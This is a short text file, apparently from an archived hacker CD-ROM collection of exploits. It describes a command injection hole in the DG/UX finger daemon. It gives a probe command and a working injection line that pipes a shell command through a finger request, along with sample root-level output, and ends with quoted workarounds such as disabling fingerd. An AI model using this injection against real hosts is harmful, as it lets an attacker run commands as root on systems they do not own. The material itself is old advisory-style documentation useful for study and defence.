home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / dgux_fingerd.txt < prev    next >
Text File  |  2001-11-06  |  852b  |  39 lines

  1.  
  2. The finger daemon that ships with dgux will allow a remote user to pipe
  3. commands, often with uid root or bin.
  4.  
  5. To check for this vulnerability, simply use the RFC compliant syntax;
  6.  
  7. finger /W@host
  8.  
  9. If it returns something like this, it may be vulnerable;
  10.  
  11. Login name: /W                          In real life: ???
  12.  
  13. To see the uid in.fingerd is running as, try this;
  14.  
  15. finger "|/bin/id@host"
  16.  
  17. Often, you will see something like this;
  18.  
  19. uid=0(root) gid=0(root)
  20.  
  21. or;
  22.  
  23. uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)
  24.  
  25.  
  26. ---------------------------------------------------------------------------
  27.  
  28.  
  29.  
  30. >
  31. > The only work arounds I can think of are:
  32. >
  33. > 1) disable fingerd
  34. > 2) use tcpwrappers, and have a wrapper program check for the offending pipe and
  35. > other shell specials 3) find a third party fingerd that DOESN'T have this wide
  36. > open door to root.
  37. >
  38.  
  39.